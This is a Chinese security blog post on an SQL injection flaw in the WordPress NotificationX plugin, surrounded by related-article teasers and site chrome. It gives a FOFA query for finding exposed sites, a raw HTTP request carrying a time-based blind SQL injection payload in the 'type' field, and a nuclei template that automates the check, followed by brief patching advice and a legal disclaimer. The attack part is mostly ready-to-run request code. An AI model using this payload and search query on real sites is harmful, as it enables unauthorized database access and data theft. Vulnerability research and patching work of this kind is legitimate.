WordPress Plugin SQL注入漏洞(CVE-2024-25832)

最新推荐文章于 2024-08-16 12:12:16 发布
最新推荐文章于 2024-08-16 12:12:16 发布
阅读量582 收藏 6
点赞数 3
文章标签: sql 数据库 前端 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/139777789
版权

漏洞描述

WordPress Plugin是一种用于扩展和增强WordPress网站功能的软件插件。WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。此产品存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。

影响版本

WordPress Plugin NotificationX

产品界面

fofa语法

body="/wp-content/plugins/notificationx"

POC

 

  1. POST /wp-json/notificationx/v1/analytics HTTP/1.1
  2. Host: 
  3. Content-Type: application/json
  5. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
 

 

 

nuclei验证
 

 

  1. id: CVE-2024-25832
  3. info:
  4. name: WordPress Plugin SQL注入漏洞(CVE-2024-25832)
  5. author: nobody
  6. severity: high
  7. description: |
  8. WordPress Plugin 存在SQL注入漏洞,恶意攻击者可能会利用此漏洞获取服务器的敏感信息,最终导致服务器失陷。
  9. impact: |
  10. 恶意攻击者可能会利用此漏洞获取服务器的敏感信息
  11. remediation: |
  12. 升级最新版本,打补丁
  13. metadata:
  14. verified: true
  15. max-request: 3
  16. fofa-query: body="/wp-content/plugins/notificationx"
  17. tags: CVE-2024-25832,sqli
  19. requests:
  20. - raw:
  21. - |-
  22. @timeout:10s
  23. POST /wp-json/notificationx/v1/analytics HTTP/1.1
  24. Host: {{Hostname}}
  25. Content-Type: application/json
  27. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
  29. matchers:
  30. - type: dsl
  31. condition: and
  32. dsl:
  33. - "duration>=5"
  34. - status_code==200 && contains_all(body,'\{\"success\":true\}')
 

 

 

修复建议
 

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问
  •  
       申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
     
    免费领取安全学习资料包!
     
    渗透工具
     
     
    技术文档、书籍
     
     
     
     
    面试题
     
    帮助你在面试中脱颖而出
     
     
    视频
     
    基础到进阶
     
    环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
     
     
     
     
    应急响应笔记
     
     
    学习路线
     
     

                

        

        

    

  


    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
漏洞复现】WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)

				
			

			

				

					qq_67810151的博客
				

				

					03-27
					
					481
					
				

			

		

		

			
				
WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。

			
		

	



                

              
                



	

		

			

				
					
WordPress plugin 代码注入漏洞(CVE-2022-24663)

				
			

			

				

					千寻的博客
				

				

					12-09
					
					2469
					
				

			

		

		

			
				
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令

			
		

	



                


  
              

                


	

		

			

				
					
漏洞复现-wordpress RCE-CVE-2024-25600

				
			

			

				

					
				

				

					04-12
					
					602
					
				

			

		

		

			
				
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!

			
		

	





	

		

			

				
					
CVE-2022-21663: WordPress <5.8.3 版本对象注入漏洞深入分析

				
			

			

				

					swordcloud_xm的博客
				

				

					07-28
					
					2625
					
				

			

		

		

			
				
通过对WordPress对象注入漏洞的深入分析与复现,我们发现漏洞的利用存在一定的复杂性。这不仅是对技术能力的挑战,也是对安全意识的考验。在学习和研究过程中,我们应始终保持谨慎和敬畏之心。

			
		

	



		

			
		



	

		

			

				
					
Wordpress漏洞

					
最新发布

				
			

			

				

					weixin_44737168的博客
				

				

					08-16
					
					441
					
				

			

		

		

			
				
WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在CVE-2020-25213 漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。WPScan是Kali Linux默认自带针对wordpress的一款扫描神器。

			
		

	





	

		

			

				
					
wordpress 漏洞_WordPress漏洞分析

				
			

			

				

					weixin_42514783的博客
				

				

					01-26
					
					5436
					
				

			

		

		

			
				
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...

			
		

	





	

		

			

				
					
漏洞复现】WordPress——Recall——SQL注入CVE-2024-32709)

				
			

			

				

					LongL_GuYu的博客
				

				

					07-11
					
					1040
					
				

			

		

		

			
				
Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞SQL命令中不恰当地中立化特殊元素,造成数据库被恶意操作的风险。

			
		

	





	

		

			

				
					
渗透测试——漏洞扫描工具

				
			

			

				

					wuli1024的博客
				

				

					11-20
					
					1110
					
				

			

		

		

			
				
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。

			
		

	





	

		

			

				
					
wordpress sql综合注入

				
			

			

				

					weixin_33832340的博客
				

				

					06-28
					
					470
					
				

			

		

		

			
				
这是wordpress sql综合注入。当然也是已知的漏洞,不过国外都很喜欢装一些乱七八糟的插件。这个脚本易改。易懂,可自己添加,所以留着,备用吧,
用法:python2.6 wordpress.py (建议用python2.6或更新版本)
脚本内容:(保存为*.py)
#!/usr/bin/python
#WordPress SQL Injection Checke...

			
		

	





	

		

			

				
					
wordpress漏洞_WordPress站点恶意JS注入漏洞分析

				
			

			

				

					weixin_39980184的博客
				

				

					11-07
					
					182
					
				

			

		

		

			
				
Sucuri的安全研究人员检测到攻击者利用Wordpress插件的漏洞进行攻击活动。该攻击活动中有超过2000个WordPress网站被黑,并重定向受害者到含有浏览器通知订阅、假的问卷调研和假的Adobe Flash下载活动的垃圾邮件站点。 JS注入该漏洞被利用后,攻击者可以注入JS脚本到站点的主体,JS脚本可以从admarketlocation[.]com和 gotosecond2[....

			
		

	





	

		

			

				
					
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf

				
			

			

				

					09-27
				

			

		

		

			
				
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...

			
		

	





	

		

			

				
					
wp-plugin-vulnerabilities:WordPress插件漏洞的集合

				
			

			

				

					05-16
				

			

		

		

			
				
wp-plugin漏洞
WordPress插件漏洞的标准化集合。
 用于此目的的数据已从WordPress.org存储库中的“”插件中提取,并以标准的YAML格式存储。 这些开发人员已为此YAML提供了所有原始源数据,我们所做的只是从PHP源代码中提取数据并将其存储在YAML中。
 YAML结构的密钥是WordPress.org插件的子标签,可用于使用插件的目录名称轻松地识别已安装的插件(不幸的是,由于WordPress.org插件的性质,这种方法并不总是可靠的)。
 我们将尽一切努力使它保持最新状态并与插件版本保持一致。
 标签是从插件导入数据的日期,并查看它是“最新”的,将其与该插件的“最新更新”日期发布进行比较。
 我想与原始开发人员合作,为此创建一个标准的数据存储,所以我还是朝着前进的方向迈进了-这毕竟是开源项目的目的。 为了帮助这个项目,请随时发出拉取请求等,我将在适当的时候考虑

			
		

	





	

		

			

				
					
漏洞复现】WordPress Automatic SQL注入漏洞(CVE-2024-27956)

				
			

			

				

					qq_67810151的博客
				

				

					05-07
					
					475
					
				

			

		

		

			
				
WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。

			
		

	





	

		

			

				
					
WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698)

				
			

			

				

					0xSec
				

				

					03-20
					
					784
					
				

			

		

		

			
				
WordPress plugin NotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备,很容易通过“type”参数受到 SQL 注入攻击。

			
		

	





	

		

			

				
					
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)

				
			

			

				

					0xSec
				

				

					05-01
					
					1213
					
				

			

		

		

			
				
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。

			
		

	





	

		

			

				
					
WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)

				
			

			

				

					0xSec
				

				

					05-05
					
					763
					
				

			

		

		

			
				
WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。

			
		

	





	

		

			

				
					
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现

				
			

			

				

					weixin_50464560的博客
				

				

					09-07
					
					5001
					
				

			

		

		

			
				
转载https://www.freebuf.com/articles/web/321297.html。

			
		

	





	

		

			

				
					
插件漏洞导致 60 万个 WordPress 网站遭受攻击

				
			

			

				

					网络研究观
				

				

					11-16
					
					4838
					
				

			

		

		

			
				
建议所有使用该插件的用户尽快升级到最新版本。

			
		

	





	

		

			

				
					
漏洞分析 | Wordpress Fastest Cache插件SQL注入漏洞CVE-2023-6063)

				
			

			

				

					WangsuSecurity的博客
				

				

					01-25
					
					1182
					
				

			

		

		

			
				
WP Fastest Cache < 1.2.2版本存在SQL注入漏洞,可导致未经身份验证的攻击者读取站点数据库中的内容。

			
		

	





	

		

			

				
					
wordpress plugin 代码注入漏洞

				
			

			

				

					05-01
				

			

		

		

			
				
wordpress plugin 代码注入漏洞是指恶意攻击者可以利用互联网中存在的溢出漏洞和路径遍历漏洞,向特定的wordpress插件中注入恶意代码,从而导致网站遭受攻击或者被黑客攻破。

一旦攻击者成功注入恶意代码,就可以窃取网站的敏感信息、修改网站源码、破坏网站内容等等恶意行为。此外,攻击者还可以利用wordpress插件中的安全漏洞,实施远程代码执行,导致网站信息泄露或者被攻击控制。

为避免wordpress插件代码注入漏洞,网站管理员应该及时更新wordpress版本和插件,避免使用来路不明的插件,关闭不必要的功能模块,对上传文件限制类型和大小等措施。同时,需要加强密码管理,禁止使用弱密码等不安全措施,以此保险起见,谢谢。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值